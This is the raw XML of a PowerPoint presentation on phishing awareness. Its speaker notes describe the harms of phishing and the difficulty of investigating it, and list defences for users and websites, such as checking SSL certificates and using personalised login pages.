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s/slide37.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56.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36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide8.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slideLayouts/slideLayout6.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3.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5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSl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slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide29.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24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide18.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58"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="512" r:id="rId3"/>
    <p:sldId id="488" r:id="rId4"/>
    <p:sldId id="489" r:id="rId5"/>
    <p:sldId id="514" r:id="rId6"/>
    <p:sldId id="540" r:id="rId7"/>
    <p:sldId id="515" r:id="rId8"/>
    <p:sldId id="510" r:id="rId9"/>
    <p:sldId id="536" r:id="rId10"/>
    <p:sldId id="537" r:id="rId11"/>
    <p:sldId id="511" r:id="rId12"/>
    <p:sldId id="518" r:id="rId13"/>
    <p:sldId id="519" r:id="rId14"/>
    <p:sldId id="521" r:id="rId15"/>
    <p:sldId id="494" r:id="rId16"/>
    <p:sldId id="538" r:id="rId17"/>
    <p:sldId id="539" r:id="rId18"/>
    <p:sldId id="496" r:id="rId19"/>
    <p:sldId id="498" r:id="rId20"/>
    <p:sldId id="535" r:id="rId21"/>
    <p:sldId id="541" r:id="rId22"/>
    <p:sldId id="542" r:id="rId23"/>
    <p:sldId id="502" r:id="rId24"/>
    <p:sldId id="503" r:id="rId25"/>
    <p:sldId id="504" r:id="rId26"/>
    <p:sldId id="505" r:id="rId27"/>
    <p:sldId id="525" r:id="rId28"/>
    <p:sldId id="506" r:id="rId29"/>
    <p:sldId id="507" r:id="rId30"/>
    <p:sldId id="508" r:id="rId31"/>
    <p:sldId id="567" r:id="rId32"/>
    <p:sldId id="568" r:id="rId33"/>
    <p:sldId id="544" r:id="rId34"/>
    <p:sldId id="545" r:id="rId35"/>
    <p:sldId id="546" r:id="rId36"/>
    <p:sldId id="547" r:id="rId37"/>
    <p:sldId id="548" r:id="rId38"/>
    <p:sldId id="549" r:id="rId39"/>
    <p:sldId id="550" r:id="rId40"/>
    <p:sldId id="551" r:id="rId41"/>
    <p:sldId id="552" r:id="rId42"/>
    <p:sldId id="553" r:id="rId43"/>
    <p:sldId id="554" r:id="rId44"/>
    <p:sldId id="555" r:id="rId45"/>
    <p:sldId id="556" r:id="rId46"/>
    <p:sldId id="557" r:id="rId47"/>
    <p:sldId id="558" r:id="rId48"/>
    <p:sldId id="559" r:id="rId49"/>
    <p:sldId id="560" r:id="rId50"/>
    <p:sldId id="561" r:id="rId51"/>
    <p:sldId id="562" r:id="rId52"/>
    <p:sldId id="563" r:id="rId53"/>
    <p:sldId id="564" r:id="rId54"/>
    <p:sldId id="565" r:id="rId55"/>
    <p:sldId id="566" r:id="rId56"/>
    <p:sldId id="543"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ustomXml" Target="../customXml/item2.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65"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B2882A-A021-43C9-B17D-BB5EEFCE9EF9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/1/2019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7CC651-BBCC-4EE9-8A6C-F03BA3B2EB6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4276676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650B9AE0-D67E-4281-9656-1A2046B2EAF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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142E1CB-CBAC-4A8B-A7B4-55E3EB8625A0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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7251520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0FFE42A-1DDF-47D9-B643-F7C75882AFCE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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1460678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81500D3-0E73-43C7-A1E1-A7E828DCC091}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2458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6747128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C3C37C1-1201-42D6-A8D2-681EEBA45FE6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628"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4185855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6F1A779-9BB6-4DED-AC1C-44A7429C5B45}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> fraud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> - Phishers can run up charges on your account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Identity theft – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Can open new accounts, sign utility or loan contracts in your name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>or use a false ID and commit crimes using your personal information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Loss to the original institutions- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling approximately $929 million USD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0"/>
              <a:t>Difficulties in Law Enforcement Investigations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>. Unlike certain other types of identity theft that law enforcement agencies can successfully investigate in a single geographic area (e.g., theft of wallets, purses, or mail), phishing – like other types of crime that exploit the Internet -- can be conducted from any location where phishers can obtain Internet access. This can include situations in which a phisher in one country takes control of a computer in another country, then uses that computer to host his phishing website or send his phishing e-mails to residents of still other countries. Moreover, online criminal activity in recent years has often reflected clearcut divisions of labor. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33078911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19EB62C-1F50-4397-B236-B15E8FA7F059}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724"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8192337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B691FDC-5C7B-44A8-9212-02859FD917B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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1155650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7A972B9-03C4-452F-B8BB-13D373944913}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3482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7872522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06B90C43-2DF8-47AE-82F8-62D00273F471}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Think twice before you open an email and never get carried away by the social engineering statements in the mail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Never click on links provided in an email, message boards or mailing lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Never submit sensitive information on forms embedded in emails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Inspect the address bar and the SSL certificate to see if they match with the exact name of the site. Pay attention to SSL certificate warning prompts that appear when contacting a spoofed site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Make sure that you have the latest patched version of Web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Install latest anti-virus packages, personal firewall and spyware / spam blockers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Never open any suspicious email attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Destroy all PIN / password letters and never write them down somewhere. Never disclose personal / sensitive information to anyone at any instant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Regularly log in to your accounts and check the activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>In the event of a phishing attack, Provide a means for the user to report the scam via phone or email. Clearly instruct them about the procedure to follow to report the scam </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Instruct the user to reset his password / PIN immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="953551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ECD3794-35C9-481E-BEAE-E04DEF5420B3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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173398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240643" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240644" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3884414" y="8684381"/>
            <a:ext cx="2972098" cy="458108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90567" tIns="45283" rIns="90567" bIns="45283" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{CCB03836-2063-47DE-9FAD-1ED709D33C06}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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3382E00-46E8-49CB-BFAD-84CAF9379364}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Web page personalization – two ways to do it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Web sites can use two page to authenticate the users. The first page asks the user to provide only the user name.  Upon receiving a valid user name, the user is given a personalized page for entering his authentication token. The second page is personalized with last login details or based on some user provided phrase or a user chose image. This will make it difficult for a fake site to provide the second page. (For static authentication tokens like password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t> Client-side persistent cookies can be user. On first login, a cookie will be generated with a simple personal string such as first name.  Next time, the app greets ther user with this string bfore he logs in. But the succes of this option depends a lot on the alertness of the end user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8975828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6E810DA-2D0B-44ED-8B4C-84584976C81E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
